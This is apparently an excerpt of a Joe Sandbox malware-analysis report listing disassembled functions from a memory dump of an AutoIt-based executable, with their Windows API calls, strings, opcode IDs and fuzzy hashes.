                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InfoItemMenu_memset
                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                      • API String ID: 2223754486-4108050209
                                                                                                                                                                                      • Opcode ID: a0225fa6983f40051b920b571bb011841a84bbb21054c7885dbf73975c2e9357
                                                                                                                                                                                      • Instruction ID: 3b84c7a5fdd6d92ec0c73008bcaa1638bfc9234488d51e0f503c833bc8ecf50b
                                                                                                                                                                                      • Opcode Fuzzy Hash: a0225fa6983f40051b920b571bb011841a84bbb21054c7885dbf73975c2e9357
                                                                                                                                                                                      • Instruction Fuzzy Hash: D831B671A00709ABDB24CFD8D8C5FADBBF9EF45351F190019E9C1961A2D7709A44DF10
                                                                                                                                                                                      Function 00956B60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • __snwprintf.LIBCMT ref: 00956BDD
                                                                                                                                                                                        • Part of subcall function 0090CAEE: _memmove.LIBCMT ref: 0090CB2F
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: __snwprintf_memmove
                                                                                                                                                                                      • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                                                                                      • API String ID: 3506404897-2584243854
                                                                                                                                                                                      • Opcode ID: aea5f8cc8a0190af2764e7184b51ed55246460e7d04d5082153e301049efc8cb
                                                                                                                                                                                      • Instruction ID: b6108c92abac8e26a6982dfb618d98415640f14d1079b19155cb9531ec1452cf
                                                                                                                                                                                      • Opcode Fuzzy Hash: aea5f8cc8a0190af2764e7184b51ed55246460e7d04d5082153e301049efc8cb
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0E215C31600219EECF14EFA5C982FAE77B9AB85700F504459F985A7181DA70EA45CBA1
                                                                                                                                                                                      Function 009691DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00969269
                                                                                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00969274
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                      • String ID: Combobox
                                                                                                                                                                                      • API String ID: 3850602802-2096851135
                                                                                                                                                                                      • Opcode ID: 4a369decfc4347ce817046f258d1bf1342ce348233c3d57ba304783b9a8d8790
                                                                                                                                                                                      • Instruction ID: da5d1f60cab6d3733a8ab190a04150fcfbd62c0ce4673f9f3044b8057800e648
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a369decfc4347ce817046f258d1bf1342ce348233c3d57ba304783b9a8d8790
                                                                                                                                                                                      • Instruction Fuzzy Hash: A311B271300209BFEF118F54DC90EEB37AEEB893A4F104124F9289B290D631EC519BA0
                                                                                                                                                                                      Function 0096970B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0091C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0091C657
                                                                                                                                                                                        • Part of subcall function 0091C619: GetStockObject.GDI32(00000011), ref: 0091C66B
                                                                                                                                                                                        • Part of subcall function 0091C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0091C675
                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00969775
                                                                                                                                                                                      • GetSysColor.USER32(00000012), ref: 0096978F
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                                      • String ID: static
                                                                                                                                                                                      • API String ID: 1983116058-2160076837
                                                                                                                                                                                      • Opcode ID: 81fd9203b9ac394e93c5c088bfd9260b61a47b0b51fa6e4d535d69a945e749a1
                                                                                                                                                                                      • Instruction ID: fb88f2d4a03aad69d869545c5f2df31abccd9d858bb11028fb8b205cb21be6f8
                                                                                                                                                                                      • Opcode Fuzzy Hash: 81fd9203b9ac394e93c5c088bfd9260b61a47b0b51fa6e4d535d69a945e749a1
                                                                                                                                                                                      • Instruction Fuzzy Hash: D7113772620209AFDB04DFB8CD45EEA7BB8FB48354F004629F956E3241E735E851DB50
                                                                                                                                                                                      Function 00969424 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetWindowTextLengthW.USER32(00000000), ref: 009694A6
                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 009694B5
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: LengthMessageSendTextWindow
                                                                                                                                                                                      • String ID: edit
                                                                                                                                                                                      • API String ID: 2978978980-2167791130
                                                                                                                                                                                      • Opcode ID: 56efc33a340e3c4a430d626a71c9481bcf3baa0a0682c2f805c7f43f60a41c9d
                                                                                                                                                                                      • Instruction ID: 9b7f79e972cc6b639d345841ca94c95bec9f4696f8d0a0a2b5ce90562a3f1d9d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 56efc33a340e3c4a430d626a71c9481bcf3baa0a0682c2f805c7f43f60a41c9d
                                                                                                                                                                                      • Instruction Fuzzy Hash: E6118C71115218AFEF108EA4DC80EEB3B6EEB45378F604724F965971E0CB76DC52AB60
                                                                                                                                                                                      Function 00945C80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _memset.LIBCMT ref: 00945CF3
                                                                                                                                                                                      • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00945D12
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InfoItemMenu_memset
                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                      • API String ID: 2223754486-4108050209
                                                                                                                                                                                      • Opcode ID: 84b1db4bb942a4111ac34c1150dcdd3d003e398ad62159764f6da39f069554c1
                                                                                                                                                                                      • Instruction ID: b7a9130a5ed60411957072126462528302bf3fd1586dfbc74b89d2658414c566
                                                                                                                                                                                      • Opcode Fuzzy Hash: 84b1db4bb942a4111ac34c1150dcdd3d003e398ad62159764f6da39f069554c1
                                                                                                                                                                                      • Instruction Fuzzy Hash: 18118E72D15618ABDB20DA98D848F9977EDAF06354F1A0021F941EB1D2D370AE04D791
                                                                                                                                                                                      Function 009553F6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0095544C
                                                                                                                                                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00955475
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Internet$OpenOption
                                                                                                                                                                                      • String ID: <local>
                                                                                                                                                                                      • API String ID: 942729171-4266983199
                                                                                                                                                                                      • Opcode ID: d3ca8de96df71e238704e9fa17c1039810c3600ba32f96712234e9776dd8aa42
                                                                                                                                                                                      • Instruction ID: a41af90ddf238256283671c70f25a862db9cbe2446c770824affce56d3fd038b
                                                                                                                                                                                      • Opcode Fuzzy Hash: d3ca8de96df71e238704e9fa17c1039810c3600ba32f96712234e9776dd8aa42
                                                                                                                                                                                      • Instruction Fuzzy Hash: F011C170151A21BADB14CF5288A4EEABB6CEF12753F11862AF90582051E3706988C7B0
                                                                                                                                                                                      Function 0095ACD3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0095ACF5
                                                                                                                                                                                      • htons.WSOCK32(00000000,?,00000000), ref: 0095AD32
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: htonsinet_addr
                                                                                                                                                                                      • String ID: 255.255.255.255
                                                                                                                                                                                      • API String ID: 3832099526-2422070025
                                                                                                                                                                                      • Opcode ID: 26312b51edb10088af996dcf0e88103ec364587db959039b3b6c8eec582fa9dd
                                                                                                                                                                                      • Instruction ID: 02fd9fcd430351483e7a068db6828ce431c980fde2b3c56a111fe4fbb8791587
                                                                                                                                                                                      • Opcode Fuzzy Hash: 26312b51edb10088af996dcf0e88103ec364587db959039b3b6c8eec582fa9dd
                                                                                                                                                                                      • Instruction Fuzzy Hash: EF01D274200205ABCB10EFA5C846FAEB3B4EF44725F108A16F9159B2D1D671E808C75A
                                                                                                                                                                                      Function 0093C577 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0090CAEE: _memmove.LIBCMT ref: 0090CB2F
                                                                                                                                                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0093C5E5
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend_memmove
                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                      • API String ID: 1456604079-1403004172
                                                                                                                                                                                      • Opcode ID: fd4157f84629a2e3d4ec5490a2f8094f4e14fd5b8c3c6c5d80ed936954fb0333
                                                                                                                                                                                      • Instruction ID: ce03a3ca595566440a68b20b1677153e84f7d2141d2500d7315cd26c97dd9282
                                                                                                                                                                                      • Opcode Fuzzy Hash: fd4157f84629a2e3d4ec5490a2f8094f4e14fd5b8c3c6c5d80ed936954fb0333
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0801B1B1615618AFCB08EBA4CC52AFE73A9EF82310B140A19F462E72D1DA3469089B50
                                                                                                                                                                                      Function 0094C4D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: __fread_nolock_memmove
                                                                                                                                                                                      • String ID: EA06
                                                                                                                                                                                      • API String ID: 1988441806-3962188686
                                                                                                                                                                                      • Opcode ID: 270e1669442b541472d563fe3c2e0256a08010b1236f29b0a10239a84d323566
                                                                                                                                                                                      • Instruction ID: 020e5abe5214f7d4e5ab2e20881457434d63e314e8f1c26392d32ace32b0b561
                                                                                                                                                                                      • Opcode Fuzzy Hash: 270e1669442b541472d563fe3c2e0256a08010b1236f29b0a10239a84d323566
                                                                                                                                                                                      • Instruction Fuzzy Hash: CF01F572904228AEDB28D7A8C856FFE7BF89F45315F00415AF193D6181E5B8A7088B60
                                                                                                                                                                                      Function 0093C473 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0090CAEE: _memmove.LIBCMT ref: 0090CB2F
                                                                                                                                                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 0093C4E1
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend_memmove
                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                      • API String ID: 1456604079-1403004172
                                                                                                                                                                                      • Opcode ID: 66d16f850f60f27e50edd512c49f5d0b482eee63b1e5bcf3fcf51605ce9c879c
                                                                                                                                                                                      • Instruction ID: 07aa70e4da6b8b594b560c4d700b5cc99e3e34b904d1aca498894f206631534f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 66d16f850f60f27e50edd512c49f5d0b482eee63b1e5bcf3fcf51605ce9c879c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 30018FB1641508ABDB04EBA4CA66BFF73AC9B85300F140515B542F32D1EA545E089BA1
                                                                                                                                                                                      Function 0093C4F6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0090CAEE: _memmove.LIBCMT ref: 0090CB2F
                                                                                                                                                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 0093C562
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend_memmove
                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                      • API String ID: 1456604079-1403004172
                                                                                                                                                                                      • Opcode ID: 9771b13433c6f6fa1d96ace70d7f0d3aac759187abcd2c97cc6264e66d8939c4
                                                                                                                                                                                      • Instruction ID: c5a66a4381a7495a1ef3dccef5ab43ecf1b5e89345bc428e3b9cf455de38ebce
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9771b13433c6f6fa1d96ace70d7f0d3aac759187abcd2c97cc6264e66d8939c4
                                                                                                                                                                                      • Instruction Fuzzy Hash: CD01ADB1A45508ABDB04EBA4CA52FFF73AC9B41701F240515B403F32C1EA54AE09ABB1
                                                                                                                                                                                      Function 0094804C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ClassName_wcscmp
                                                                                                                                                                                      • String ID: #32770
                                                                                                                                                                                      • API String ID: 2292705959-463685578
                                                                                                                                                                                      • Opcode ID: 9882ddcf957da2e85b321f8bc0eb441fe2277b533d39d798b04b9c7f8cf6b4e3
                                                                                                                                                                                      • Instruction ID: d6131d3c9e34f86c5bac1e03db929a805df6f241707189a9c38846919e802398
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9882ddcf957da2e85b321f8bc0eb441fe2277b533d39d798b04b9c7f8cf6b4e3
                                                                                                                                                                                      • Instruction Fuzzy Hash: E0E0D833A0422967D720EBA5AC4AFDBFBACEB917A4F004026F924D3181E670964587D0
                                                                                                                                                                                      Function 0093B35D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0093B36B
                                                                                                                                                                                        • Part of subcall function 00922011: _doexit.LIBCMT ref: 0092201B
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Message_doexit
                                                                                                                                                                                      • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                      • API String ID: 1993061046-4017498283
                                                                                                                                                                                      • Opcode ID: b85643a7e903f70020c523404072d05d5800e22eb62458414049577f4c04714e
                                                                                                                                                                                      • Instruction ID: e9f41e401f2669a5f3074ae53db62389abf4e2c923a4311c6139ecc27b8b4bd5
                                                                                                                                                                                      • Opcode Fuzzy Hash: b85643a7e903f70020c523404072d05d5800e22eb62458414049577f4c04714e
                                                                                                                                                                                      • Instruction Fuzzy Hash: CED0123138932832D21522987D4BFC5778C8F85B65F000015BF0C951D28AD2A49052E9
                                                                                                                                                                                      Function 0097BC74 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(?), ref: 0097BAB8
                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0097BCAB
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
